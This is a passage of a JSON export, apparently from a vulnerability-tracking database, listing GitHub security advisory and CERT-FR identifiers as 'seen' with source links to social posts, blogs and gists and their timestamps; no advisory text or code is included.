"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pv2c-97pp-vxwg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901113279203094", "content": "", "creation_timestamp": "2025-01-27T15:51:02.011980Z"}, {"uuid": "3ee5e943-31ab-4a47-a5d8-fbf4049f787c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56w8-8ppj-2p4f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113902821517718171", "content": "", "creation_timestamp": "2025-01-27T23:05:27.730192Z"}, {"uuid": "78b157c6-f24d-405d-b690-01ddac4ace90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wwx5-gpgr-vxr7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113906744458245865", "content": "", "creation_timestamp": "2025-01-28T15:43:07.010526Z"}, {"uuid": "3803a0d0-d501-4587-ae58-a33c5bdf6917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X684-96HH-833X", "type": "seen", "source": "https://t.me/brutsecurity/1553", "content": "", "creation_timestamp": "2026-07-09T03:00:09.517820Z"}, {"uuid": "d8e89624-a661-43e2-b3bb-95f12e537c9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5rv-w9pm-8qp8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113920512197050890", "content": "", "creation_timestamp": "2025-01-31T02:04:26.145211Z"}, {"uuid": "2e16af89-b21c-41f5-8452-e342247467a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcr5-wv4p-h2g2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913498919897595", "content": "", "creation_timestamp": "2025-01-29T20:20:51.993567Z"}, {"uuid": "08cd4103-765f-4a0d-82a7-dd59ec294ad1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2mqw-rq5m-8hc8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913533921377180", "content": "", "creation_timestamp": "2025-01-29T20:29:46.414203Z"}, {"uuid": "c605c5e6-f142-4c1b-8668-9c0388bd87bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2vpq-fh52-j3wv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913533939678038", "content": "", "creation_timestamp": "2025-01-29T20:29:46.527789Z"}, {"uuid": "6f76ce1d-08ea-489a-983c-ac0cd029ffea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m4f6-vcj4-w5mx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913533956588236", "content": "", "creation_timestamp": "2025-01-29T20:29:46.777046Z"}, {"uuid": "cd65a364-49e3-472e-a5a7-8e78f6d02783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c7w4-9wv8-7x7c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113958415500125710", "content": "", "creation_timestamp": "2025-02-06T18:43:44.547514Z"}, {"uuid": "a82758a9-a692-42f5-bd5f-a1c843bc43fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79f6-p65j-3m2m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113952958359120211", "content": "", "creation_timestamp": "2025-02-05T19:35:55.164829Z"}, {"uuid": "e0184def-1416-45ec-8400-932d9fd2a4e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pggg-vpfv-4rcv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901525767780817", "content": "", "creation_timestamp": "2025-01-27T17:35:56.370716Z"}, {"uuid": "91093b31-732c-4694-8c67-cec9e52d2ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-002", "type": "seen", "source": "https://bsky.app/profile/auditum.fr/post/3lgqiascdk32d", "content": "", "creation_timestamp": "2025-01-27T17:39:06.615290Z"}, {"uuid": "19b92830-e474-4401-9e00-a176fc3a3bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73GX-X7R9-77X2", "type": "seen", "source": "https://t.me/brutsecurity/1597", "content": "", "creation_timestamp": "2026-07-09T03:00:09.223820Z"}, {"uuid": "c3e9e6ec-8c55-4455-a396-82e5e3f94c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rh4j-5rhw-hr54", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901548168353266", "content": "", "creation_timestamp": "2025-01-27T17:41:37.887066Z"}, {"uuid": "973adbff-e3e2-4b44-b9cf-bbb01803f9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h6cc-rc6q-23j4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901574697474273", "content": "", "creation_timestamp": "2025-01-27T17:48:22.723338Z"}, {"uuid": "8673cf05-9581-47bd-bd5e-fecfe94c233c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j4h8-vch3-f797", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901597263624137", "content": "", "creation_timestamp": "2025-01-27T17:54:07.085607Z"}, {"uuid": "4283403e-9ce1-4fc7-98e2-ccb0f9ef41f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2452-6xj8-jh47", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113886275645982803", "content": "", "creation_timestamp": "2025-01-25T00:57:37.861485Z"}, {"uuid": "38acfff2-9451-4536-847e-674c9f9e94c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg6x-rcgg-rjx6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113886275645982803", "content": "", "creation_timestamp": "2025-01-25T00:57:37.906468Z"}, {"uuid": "08d21813-f9e9-4267-b82b-d216b405ccb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gf7-ff8x-hq99", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113886275660665490", "content": "", "creation_timestamp": "2025-01-25T00:57:38.005085Z"}, {"uuid": "63270630-1ed3-4bee-9193-5171637ee85e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-013", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3llokwdevlm2w", "content": "", "creation_timestamp": "2025-03-31T14:27:34.653183Z"}, {"uuid": "925112cb-68c6-48da-b70b-60a6f08400c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "seen", "source": "https://t.me/brutsecurity/1611", "content": "", "creation_timestamp": "2026-07-09T03:00:09.147510Z"}, {"uuid": "6bd83267-2c9a-419d-a45e-fd2a477f1796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73gx-x7r9-77x2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114070375285137680", "content": "", "creation_timestamp": "2025-02-26T13:16:35.343936Z"}, {"uuid": "1c55916d-9bb7-4d9d-bf92-6f56ce9a9459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52jp-hrpf-2jff", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pp6o62d", "content": "", "creation_timestamp": "2025-03-14T18:23:03.437004Z"}, {"uuid": "2ea79e63-35d5-4d31-a651-90589c0b6ebd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcmh-g36c-qc44", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkea5pvarj26", "content": "", "creation_timestamp": "2025-03-14T18:23:04.045569Z"}, {"uuid": "e086e41c-efa1-4f30-a177-e357b4baff05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c86q-rj37-8f85", "type": "seen", "source": "https://github.blog/security/vulnerability-research/a-maintainers-guide-to-vulnerability-disclosure-github-tools-to-make-it-simple/", "content": "", "creation_timestamp": "2025-03-24T15:00:33.000000Z"}, {"uuid": "1132e048-9256-43b8-9380-63f0401016c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114201195359591645", "content": "", "creation_timestamp": "2025-03-21T15:45:51.119879Z"}, {"uuid": "e0b454ee-7dd4-4ef0-8b1e-57a804fc1c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-009", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lji6suji3y2i", "content": "", "creation_timestamp": "2025-03-03T14:44:31.915861Z"}, {"uuid": "3d4f5f97-05d4-4527-aa5c-cfb7faefc998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x489-xx2m-vc43", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113991847214655450", "content": "", "creation_timestamp": "2025-02-12T16:25:52.046356Z"}, {"uuid": "4a83a287-7aae-4ca8-b0fc-eba12f7a9fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g2v-jj9q-g3rg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113991847229088447", "content": "", "creation_timestamp": "2025-02-12T16:25:52.354265Z"}, {"uuid": "9f6a8002-7da1-4f94-ab2c-a3c1c8c2ea4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mvx-qw4r-fcqf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992187494675681", "content": "", "creation_timestamp": "2025-02-12T17:52:24.263977Z"}, {"uuid": "959646f0-7a43-4876-87f0-2767f64eeb97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29c6-3hcj-89cf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992187510032617", "content": "", "creation_timestamp": "2025-02-12T17:52:24.465908Z"}, {"uuid": "1e676ce1-5544-4e72-b6fc-27373586f99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-593f-38f6-jp5m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992250696737741", "content": "", "creation_timestamp": "2025-02-12T18:08:28.810968Z"}, {"uuid": "0755fe40-0ebf-440f-bdb6-14177d51b534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfhm-ppq8-7hgx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992291260057149", "content": "", "creation_timestamp": "2025-02-12T18:18:47.586101Z"}, {"uuid": "d9f48536-ed9e-44cc-a14e-746694d14dad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pg8v-5jcv-wrvw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992291274845967", "content": "", "creation_timestamp": "2025-02-12T18:18:47.831525Z"}, {"uuid": "121ead4e-611b-445a-bb53-4aa467bcec13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrg-fc28-fcg5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113992340797617356", "content": "", "creation_timestamp": "2025-02-12T18:31:23.542969Z"}, {"uuid": "f35f5fa7-6473-443f-8921-eab1e1d15574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wfmf-8626-q3r3", "type": "seen", "source": "https://bsky.app/profile/ruza.witter.cz.ap.brid.gy/post/3ljkhsex76mp2", "content": "", "creation_timestamp": "2025-03-04T12:30:54.413781Z"}, {"uuid": "50844b2c-3eb4-445c-9357-854859c2063e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q2pc-c3jx-3852", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114180582366575557", "content": "", "creation_timestamp": "2025-03-18T00:23:42.060656Z"}, {"uuid": "03002bfb-9cf5-48c5-a09d-ba3be57c4e68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f5x-r59x-p8cf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114180582366575557", "content": "", "creation_timestamp": "2025-03-18T00:23:42.527355Z"}, {"uuid": "6ef6c70b-171e-417f-bf15-756b13bb2f74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p38w-p2r8-g6g5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114180582366575557", "content": "", "creation_timestamp": "2025-03-18T00:23:42.375302Z"}, {"uuid": "9efa087d-903f-4014-85c0-fb727144b27c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2p3-33ff-r555", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114185140719428080", "content": "", "creation_timestamp": "2025-03-18T19:42:56.985145Z"}, {"uuid": "1ddf43e1-b743-4387-9bf0-b3089a6a89f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g6g-9gj4-8c68", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114180582366575557", "content": "", "creation_timestamp": "2025-03-18T00:23:42.222059Z"}, {"uuid": "896e9bc0-8453-4a5d-a295-422cb2ab6b60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcmc-xv3g-hjxv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114185140719428080", "content": "", "creation_timestamp": "2025-03-18T19:42:57.241844Z"}, {"uuid": "2c57091c-64e8-4e28-9bb7-6455b9aee6e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lkztqy6c5l2e", "content": "", "creation_timestamp": "2025-03-23T08:39:44.597941Z"}, {"uuid": "c78eb0ad-62b1-44b7-8556-69c055dfcce7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jv89-g7f7-jwfg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114185140719428080", "content": "", "creation_timestamp": "2025-03-18T19:42:57.108102Z"}, {"uuid": "0f14ed8d-0182-4ac2-b13e-13f2df2b6028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w532-jxjh-hjhj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114185162030536607", "content": "", "creation_timestamp": "2025-03-18T19:48:22.151078Z"}, {"uuid": "28ca0dcd-1c75-4e32-9a5d-0d4538759e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmg3-hpqr-gqvc", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lkxgn7bm5s26", "content": "", "creation_timestamp": "2025-03-22T09:39:39.610898Z"}, {"uuid": "6ca8622c-a183-4b9a-9597-a29008375ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw9c-mfg7-9rx2", "type": "seen", "source": "https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/", "content": "", "creation_timestamp": "2025-03-12T20:07:18.000000Z"}, {"uuid": "86da005a-4dc8-4597-b30c-24b35cd6c4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg6x-rcgg-rjx6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3li524bluem26", "content": "", "creation_timestamp": "2025-02-14T10:55:50.248974Z"}, {"uuid": "1cc5cc76-6591-4806-9c12-c205303c7fea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-012", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3ll4uvokpb726", "content": "", "creation_timestamp": "2025-03-24T13:38:14.906103Z"}, {"uuid": "ad2991b4-1eda-4373-89c7-b6b7ad1388c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-012", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114217680501535344", "content": "", "creation_timestamp": "2025-03-24T13:38:16.031286Z"}, {"uuid": "ad508f28-e46b-4882-830d-3f3c3806d7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67RR-84XM-4C7R", "type": "seen", "source": "https://t.me/brutsecurity/2040", "content": "", "creation_timestamp": "2026-07-09T03:00:07.192649Z"}, {"uuid": "41f7dd00-17a8-408b-957c-21e568d90c62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gr43-pwpc-mp54", "type": "seen", "source": "https://github.com/advisories/GHSA-gr43-pwpc-mp54", "content": "", "creation_timestamp": "2025-03-03T21:25:35.056304Z"}, {"uuid": "de1d9b08-195a-494a-9ef8-46ac084baa90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p626-hph9-p6fj", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/114154763751292664", "content": "", "creation_timestamp": "2025-03-13T10:57:43.504573Z"}, {"uuid": "5fca2fd8-67a9-4b67-82cf-8ffa6b783b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4vc4-m8qh-g8jm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114154846152927799", "content": "", "creation_timestamp": "2025-03-13T11:18:38.826351Z"}, {"uuid": "0cf97b2f-48ab-400f-9914-c9e67a24c894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-754f-8gm6-c4r2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114154846152927799", "content": "", "creation_timestamp": "2025-03-13T11:18:38.956870Z"}, {"uuid": "3acb998e-129a-4852-8749-f107013c4f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QCJ2-99CG-MPPF", "type": "seen", "source": "https://t.me/brutsecurity/2141", "content": "", "creation_timestamp": "2026-07-09T03:00:06.863040Z"}, {"uuid": "439f3adb-fdd4-489f-83a9-f1da4a62eff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mm6v-68qp-f9fw", "type": "seen", "source": "https://bsky.app/profile/vulns.bsky.social/post/3ligb6gmskk2g", "content": "", "creation_timestamp": "2025-02-18T02:56:16.318906Z"}, {"uuid": "2a5b833f-0211-49bf-8889-421e08ab5a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-012", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3ll6nxehcdf2h", "content": "", "creation_timestamp": "2025-03-25T06:39:14.874007Z"}, {"uuid": "7c229332-5083-4108-b748-7277861dab34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/brutsecurity/2189", "content": "", "creation_timestamp": "2026-07-09T03:00:06.611066Z"}, {"uuid": "04190e4c-efb4-49b7-a810-198dab2b8f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmg3-hpqr-gqvc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114189869676629359", "content": "", "creation_timestamp": "2025-03-19T15:45:35.284319Z"}, {"uuid": "a715b051-575a-40fb-8372-556700a1033f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wq6j-4388-4gg5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114044196487307845", "content": "", "creation_timestamp": "2025-02-21T22:18:58.693365Z"}, {"uuid": "4f5986ab-4246-4db3-8ba4-c601e47de737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrrh-fwg8-r2c3", "type": "seen", "source": "https://infosec.exchange/users/briankrebs/statuses/114178143725238694", "content": "", "creation_timestamp": "2025-03-17T14:03:33.527232Z"}, {"uuid": "24ec1177-ff62-4b01-9b6c-a4ac191c1731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrrh-fwg8-r2c3", "type": "seen", "source": "https://bsky.app/profile/briankrebs.infosec.exchange.ap.brid.gy/post/3lkld2jpff3t2", "content": "", "creation_timestamp": "2025-03-17T14:04:29.286209Z"}, {"uuid": "472c016a-2ea2-4144-8aa1-9e2b0a888490", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-011", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lkldtl2fgz2u", "content": "", "creation_timestamp": "2025-03-17T14:17:36.217285Z"}, {"uuid": "d2ab8994-de2f-4094-bc50-1a007bcba4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-011", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114178198997319032", "content": "", "creation_timestamp": "2025-03-17T14:17:36.897958Z"}, {"uuid": "74d1ab7b-3299-4184-8784-e7e7ecd500a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-010", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3ljzv6ytl3l2w", "content": "", "creation_timestamp": "2025-03-10T15:40:16.851274Z"}, {"uuid": "a8cdc26a-e50b-4bda-8b79-ae25b92f9edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-011", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lklfprml5y2s", "content": "", "creation_timestamp": "2025-03-17T14:51:15.197876Z"}, {"uuid": "185505ed-d46f-466c-b6a0-1201f90974eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g38c-wh3c-5h9r", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3liwcoiudqz2q", "content": "", "creation_timestamp": "2025-02-24T12:05:45.255155Z"}, {"uuid": "4eadf76b-f9ee-411e-a267-fd2653ad4e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9p8r-4xp4-gw5w", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/a25832bda87aee97912ff5c363392c03", "content": "", "creation_timestamp": "2025-03-25T20:45:26.000000Z"}, {"uuid": "dbf18dcc-dd0a-46da-bee1-feb16525db1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3p37-3636-q8wv", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/a25832bda87aee97912ff5c363392c03", "content": "", "creation_timestamp": "2025-03-25T20:45:26.000000Z"}, {"uuid": "52608081-346a-42aa-a51f-6e2aa2e7e9a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9wf-5777-gq43", "type": "seen", "source": "https://gist.github.com/superboy-zjc/e7c676f39f714ec4c4a6afa3a0ba037d", "content": "", "creation_timestamp": "2025-03-20T20:27:37.000000Z"}, {"uuid": "9784d462-3474-490e-944a-477d9dcd338d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ph9x-4vc9-m39g", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/a25832bda87aee97912ff5c363392c03", "content": "", "creation_timestamp": "2025-03-25T20:45:26.000000Z"}, {"uuid": 